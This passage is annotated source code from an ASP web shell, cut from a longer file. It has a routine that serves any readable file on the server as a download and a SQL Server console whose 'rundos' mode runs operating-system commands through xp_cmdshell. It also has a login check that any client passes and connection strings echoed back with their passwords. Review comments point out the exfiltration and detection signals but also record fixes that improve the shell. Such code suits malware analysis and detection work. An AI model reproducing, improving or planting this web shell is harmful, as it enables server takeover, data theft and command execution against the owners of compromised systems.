Next
End Function
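' Return the last component of a backslash-separated path: the text after
' the final "\". Returns "" when there is no "\" at all, and also when the
' path ends in "\" (nothing follows the separator). "/" is not treated as a
' separator here (callers normalise with pn/parentdir first).
' Fix: the original copied at most 100 characters (Mid(..., lpx+1, 100)),
' silently truncating longer file names.
Function tractName(lpfilename)
    Dim sepPos
    ' Position of the last "\"; 0 when absent.
    sepPos = InStrRev(lpfilename, "\")
    If sepPos > 0 Then
        tractName = Mid(lpfilename, sepPos + 1)
    Else
        tractName = ""
    End If
End Function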
' Parent-directory helper: after turning "/" into "\", drop the last two
' "\"-separated pieces of t and return the remaining pieces, each followed
' by "\" (so "c:\a\b\" gives "c:\a\"). With fewer than three pieces the
' result is "". Any "&" in the result is rewritten as "%26" so the value
' can be placed in a query string.
' Note: t is a ByRef parameter and is reassigned, exactly as before.
function parentdir(t)
    Dim pieces, idx, acc
    t = Replace(t, "/", "\")
    pieces = Split(t, "\")
    acc = ""
    For idx = 0 To UBound(pieces) - 2
        acc = acc & pieces(idx) & "\"
    Next
    parentdir = Replace(acc, Chr(38), "%26")
End function
' Normalise a path: "/" becomes "\", then at most two trailing "\" are
' stripped (one per pass). "" and paths without a trailing separator are
' returned unchanged apart from the slash conversion.
function pn(t)
    Dim normalised, pass
    normalised = Replace(t, "/", "\")
    For pass = 1 To 2
        If Right(normalised, 1) = "\" Then
            normalised = Left(normalised, Len(normalised) - 1)
        End If
    Next
    pn = normalised
End function
' Stream the file named by strFile to the client as an attachment.
' strFile is used as given: nothing restricts it to a base directory, so any
' file the IIS worker process can read can be served. Requests that reach
' this routine should be treated as file exfiltration by the web shell.
' Depends on names defined outside this block: fs (used like a
' FileSystemObject: FileExists/GetFile) and AdodbS (the ProgID handed to
' CreateObject - presumably "ADODB.Stream", confirm).
function downFile(strFile)
Response.Buffer = True
' Drop anything already buffered so the body holds only the file bytes.
Response.Clear
Set s=Server.CreateObject(AdodbS)
s.Open
' 1 = adTypeBinary: the file is read as raw bytes.
s.Type=1
' Missing file: message and abort.
if not fs.FileExists(strFile) then Response.Write(strFile&"文件不存在!"):Response.End
Set f=fs.GetFile(strFile)
intFilelength=f.size
s.LoadFromFile(strFile)
' This check is only meaningful if "On Error Resume Next" is in effect; that
' statement is not visible in this block. NOTE(review): confirm.
if err then Response.Write("读文件出错:"&err.Description):Response.End
' f.name goes into the header unquoted and unescaped (quotes, ";" or CR/LF
' in a file name are passed through).
Response.AddHeader "Content-Disposition", "attachment; filename=" & f.name
Response.AddHeader "Content-Length", intFilelength
Response.CharSet = "UTF-8"
Response.ContentType = "application/octet-stream"
' Read with no size argument returns the whole stream.
Response.BinaryWrite s.Read
response.flush
response.clear
s.Close
Set s = Nothing
End Function
' Map a drive-type code 0..5 to its display label. Any other code leaves the
' result unassigned (Empty), as the original Select Case did.
function Tran(drv)
    Select Case drv
        Case 0
            Tran = "怪盘"
        Case 1
            Tran = "软盘"
        Case 2
            Tran = "硬盘"
        Case 3
            Tran = "网络"
        Case 4
            Tran = "光盘"
        Case 5
            Tran = "RAM"
    End Select
end function
response.end
end if
if Session("gl")="sql" then
' Strip leading whitespace from str and HTML-encode the rest for output.
function delhtml(str)
    Dim trimmed
    trimmed = LTrim(str)
    delhtml = Server.HTMLEncode(trimmed)
end function
' Null-safe pass-through: Null becomes "", any other value is returned as is.
function srs(lpstr)
    srs = lpstr
    If IsNull(lpstr) Then srs = ""
end function
' --- SQL-manager UI. This run sits inside the if Session("gl")="sql" block
' opened just above; that block's end if is not in view here. ---
' self is the page's own URL as supplied by the request; it is echoed
' unescaped into href/onclick attributes and inline script below.
self=request("url")
' Effectively removes the script timeout (value is in seconds).
server.scriptTimeout=100000
' CRLF: line separator for the emitted page, and the token the submitted
' SQL is split on before execution.
bbf=chr(13)&chr(10)
echo "<title>sqlserver数据管理v0.2</title><meta http-equiv=""pragma"" content=""no-cache""><style>"&bbf
echo "form {color:#00000;font-size:9pt;}"&bbf
echo "table {color:#00000;font-size:9pt;}"&bbf
echo "body {color:#00000;font-size:9pt;}"&bbf
echo "span {cursor:hand;color:red;background-color:black;}"&bbf
echo "</style><script>function copys(s){"&bbf
echo "document.all.sqlstr.value=s;"&bbf
echo "}</script>"&bbf
echo "<script language=""javascript"">"&bbf
' Right-click toggles whether the toolbar floats; the context menu is suppressed.
echo "function nom(){event.cancelBubble = true;event.returnValue = false;return false;}"&bbf
echo "function click() {if (event.button==2) {movable=(!movable);}nom();}"&bbf
echo "document.oncontextmenu=click"&bbf
echo "document.onmousedown=click"&bbf
echo "</script>"&bbf
echo "<body Leftmargin=""6"" Topmargin=""140"" onload=movediv()>"&bbf
echo "<script>"&bbf
echo "var movable=0;"&bbf
' Client-side: re-pin the toolbar to the scroll position every 200 ms when floating.
echo "function movediv(){"&bbf
echo "if(movable==1){"&bbf
echo "toolb.style.pixelTop= document.body.scrollTop;"&bbf
echo "toolb.style.pixelLeft= document.body.scrollLeft;"&bbf
echo "movs.innerHTML=""不浮动"";}"&bbf
echo "else{toolb.style.pixelTop= 0;toolb.style.pixelLeft= 0;"&bbf
echo "movs.innerHTML=""浮动"";}"&bbf
echo "setTimeout('movediv()',200);"&bbf
echo "}"&bbf
echo "</script>"&bbf
echo "<div id=toolb style=""position:absolute;Left:10px;Top:0px;width:100%;background-color:#eeeeee""> "&bbf
echo "<table cellspacing=0 cellpadding=0 width=100% border=1><tr><td>"&bbf
' request("table") is reflected into the form action without encoding.
echo "<form action="""&self&"?table="&request("table")&""" method=post name=form1>"&bbf
' The c= codes map to the command dispatch further down (1 tables, 2 rows,
' 3 databases, 886 logout); sel/ins/del/drop are emitted outside this block.
echo "<span onclick=document.location="""&self&"?c=3"">显示库列表</span> -"&bbf
echo "<span onclick=document.location="""&self&"?c=1"">显示所有表</span> -"&bbf
echo "<span onclick=sel();>显示当前表</span> -"&bbf
echo "<span onclick=ins();>insert</span> -"&bbf
echo "<span onclick=del();>delete</span> -"&bbf
echo "<span onclick=drop();>drop</span> -"&bbf
echo "<span onclick=createt();>create</span> -"&bbf
echo "只显[<span onclick=document.location="""&self&"?c=100"">仅用户表</span>"&bbf
echo "<span onclick=document.location="""&self&"?c=101"">所有表</span>"&bbf
echo "<span onclick=document.location="""&self&"?c=102"">仅前20条</span>"&bbf
echo "<span onclick=document.location="""&self&"?c=103"">所有条</span>] -"&bbf
echo "[<span onclick=document.location="""&self&"?c=886"">exit</span>]"&bbf
echo "<script>function createt(){document.all.sqlstr.value='create table "&session("dbo")&"[] ([id] int identity(1,1)/*mdb=autoincrement*/)';}</script>"&bbf
' The previously submitted SQL is echoed back into the textarea without HTML encoding.
echo "<textarea name=sqlstr cols=106 rows=5>"&request("sqlstr")&"</textarea><br>"&bbf
echo "<input type=submit name=ppp value=runsql>"&bbf
' ppp=rundos makes the execution run below wrap every submitted line in
' master.dbo.xp_cmdshell, i.e. OS command execution through SQL Server.
echo "<input type=submit name=ppp value=rundos>"&bbf
echo "<input type=""checkbox"" value=""n"" name=""sc"">不显示结果"&bbf
echo "<span id=movs onclick=""javascript:movable=(!movable)"">浮动</span>"&bbf
echo "</td></tr></form></table></div>"&bbf
' Logout (c=886): clear the session flag and reload the page.
if request("c")=886 then
session("islogin")=""
response.write "<script>location='"&self&"';</script>"
response.end
end if
' Access gate. request("pass") is compared with the fixed literal "islogin",
' and the form emitted just below sends that same literal in a hidden field,
' so any client that submits the form is let in: this is a login screen in
' appearance only. The host/user/upass/database fields seed the database
' connection string built after GetTableFromSQL.
if session("islogin")<>"ok" then
pass=request("pass")
if pass="islogin" then
session("islogin")="ok"
else
echo "<div style=position:absolute;width:100%;Left:10px;Top:150px;><form method=post>"&bbf
echo " <input type=hidden name=pass value=islogin><br>"&bbf
' sahost/sauser/sapass are defined outside this block (presumably default
' SQL Server connection values - confirm); they are pre-filled into the form.
echo " host:<input type=text name=host value="&sahost&"><br>"&bbf
echo " user:<input type=text name=user value="&sauser&"><br>"&bbf
echo " pass:<input type=text name=upass value="&sapass&"><br>"&bbf
echo " dbase<input type=text name=database value="&request("database")&"><br>"&bbf
echo " <input type=submit></form></div>"
response.end
end if
end if
' Write lpstr directly into the response body (no encoding, no newline).
function echo(lpstr)
    Call Response.Write(lpstr)
end function
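' Best-effort extraction of the table name from a SQL statement: the first
' word after " from ", " into " or "update", lower-cased, with one enclosing
' pair of [ ] removed. Returns Empty when none of the three keywords occurs.
' The result is concatenated into SQL by the caller, so it is not sanitised
' in any sense - it is only a convenience for the UI.
' Fix: the original passed charPo2 (an absolute position) as the *length*
' argument of Mid, so "select * from t where x=1" yielded "t where x=1";
' the length is now charPo2 - nameStart. The result is also trimmed so the
' "update" branch (whose keyword has no leading blank) no longer returns a
' name with a leading space.
Function GetTableFromSQL(Byval SQL)
    Dim charPo1, charPo2, nameStart
    SQL = LCase(SQL)
    charPo1 = InStr(1, SQL, " from ")
    If charPo1 < 1 Then charPo1 = InStr(1, SQL, " into ")
    If charPo1 < 1 Then charPo1 = InStr(1, SQL, "update")
    If charPo1 > 0 Then
        ' First character after the matched keyword (plus its blank).
        nameStart = charPo1 + 6
        ' Next blank after at least one character of the name; 0 = none.
        charPo2 = InStr(charPo1 + 7, SQL, " ")
        If charPo2 > 0 Then
            SQL = Mid(SQL, nameStart, charPo2 - nameStart)
        Else
            SQL = Mid(SQL, nameStart)
        End If
        SQL = Trim(SQL)
        If Left(SQL, 1) = "[" Then SQL = Mid(SQL, 2)
        If Right(SQL, 1) = "]" Then SQL = Left(SQL, Len(SQL) - 1)
        GetTableFromSQL = SQL
    End If
End Function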
' --- Connection set-up and statement execution ---
' Data source, login and password are taken straight from the request.
dsnname = "data source="&request("host")&";"
dsnusername = "user id="&request("user")&";"
if request("upass")<>"" then dsnpassword = "password="&request("upass")&";"
' ?database= selects the database for the session and bounces to the table list.
if request("database")<>"" then session("schoolname")=request("database"):response.redirect self&"?c=1"
if session("schoolname")="" then session("schoolname")= "master"
set adoconn = server.createobject("adodb.connection")
if request("host")<>"" then
' A host of the form x:\... is treated as an Access .mdb file path rather than
' a SQL Server name.
if mid(lcase(request("host")),2,1)=":" then
connectionstring="DRIVER={Microsoft Access Driver (*.mdb)};DBQ="&_
request("host")&";pwd="&request("upass")
' The whole connection string, pwd= included, is written into the response.
echo connectionstring
session("IsMDB")=1
session("dbo")=""
session("dsnname")=request("host")
else
session("dsnname")=dsnname
connectionstring = "provider=sqloledb.1;"&dsnname&dsnusername&dsnpassword
session("IsMDB")=0
session("dbo")="[dbo]."
end if
' Credentials persist in the session for later requests.
session("connectionstring")=connectionstring
session("only_top_20")="top 20"
end if
echo session("dsnname")&"<br>"
adoconn.open session("connectionstring")
' 3 = adUseClient: client-side cursor, which is what makes rs.recordcount usable below.
adoconn.cursorlocation=3
' Database name is concatenated into USE without quoting.
if session("IsMDB")=0 then adoconn.execute("use "&session("schoolname"))
command=request("c")
sqlstr=request.form("sqlstr")
table=request("table")
if table="" then table=GetTableFromSQL(sqlstr)
if len(sqlstr)>0 then
' "edit " / "all " prefixes dispatch to sprocedure / run_ml, defined outside this block.
if left(sqlstr,5)="edit " then sprocedure(mid(sqlstr,6)):sqlstr=""
if left(sqlstr,4)="all " then run_ml(mid(sqlstr,5)):sqlstr=""
' Every CRLF-separated line of the textarea is executed as its own statement.
runsqls=split(sqlstr,bbf)
for k=0 to ubound(runsqls)
if request("ppp")="rundos" then
' rundos: the line is wrapped in master.dbo.xp_cmdshell, so SQL Server runs it
' as an OS command. For detection, xp_cmdshell in SQL audit/trace output and
' child processes spawned by the SQL Server service are the signals to watch.
runsqls(k)="exec master.dbo.xp_cmdshell '"&runsqls(k)&"'"
end if
' The statement is echoed back to the page before it runs.
echo runsqls(k)&"----"&"<br>"
if len(runsqls(k))>0 then
set rs=adoconn.execute(runsqls(k))
' sc=n suppresses result output.
if request("sc")<>"n" then
if request("ppp")<>"rundos" then
' showsss (result-set renderer) is defined outside this block.
showsss rs
else
' xp_cmdshell output: one row per line of command output.
for oi=1 to rs.recordcount
reword=srs(rs(0).value)
if reword<>"" then
' "<" is replaced with "&lt" (no trailing ";") before echoing.
reword=replace(reword,"<",chr(38)&"lt")
reword=replace(reword," ","  ")
echo reword&"<br>"&bbf
end if
rs.movenext
next
end if
end if
end if
next
end if
' --- Browsing commands: c=1 table list, c=2 rows of one table, c=3 database list ---
if command=1 then
if session("IsMDB")=1 then
' Access file: enumerate tables through the ADOX catalog.
Set ADOX = Server.CreateObject("ADOX.Catalog")
ADOX.ActiveConnection = adoconn
For Each tb in ADOX.Tables
If tb.Type = "TABLE" Then
echo " <a href="&self&"?c=2&table="&tb.Name&">"&bbf
echo " "&tb.Name &"</a><br>"&bbf
echo " "
End If
Next
response.end
else
' SQL Server: list tables from sysobjects. session("only_user_table") is set
' outside this block (presumably by the c=100/c=101 toggles - confirm) and is
' appended to the WHERE clause as-is.
sql="select name from sysobjects where "&_
"objectproperty(object_id(name),'istable')=1"&session("only_user_table")
set rs=adoconn.execute(sql)
for iz=1 to rs.recordcount
echo "<a href="&self&"?c=2&table="&rs(0).value&_
">"&rs(0).value&"</a><br>"
rs.movenext
next
end if
end if
if command=2 then
if table<>"" then
' table comes from request("table") or GetTableFromSQL and is concatenated
' into the SELECT unquoted; session("only_top_20") limits the rows.
set rs=adoconn.execute("select "&session("only_top_20")&" * from "&session("dbo")&table)
showsss rs
echo "</table>"
' scripts and insert are defined outside this block.
echo "<script>"&scripts&"</script>"&insert
end if
end if
if command=3 then
' Enumerate databases from master..sysdatabases; each name links back with
' ?database=, which the connection block stores in session("schoolname").
set rs=adoconn.execute("select name,filename from master..sysdatabases")
echo "<table>"
for dd=1 to rs.recordcount
echo "<tr><td><a href="&self&"?database="&rs(0).value&">"&rs(0).value&"</a></td><td>"&rs(1).value&"</td></tr>"
rs.movenext
next
echo "</table>"
end if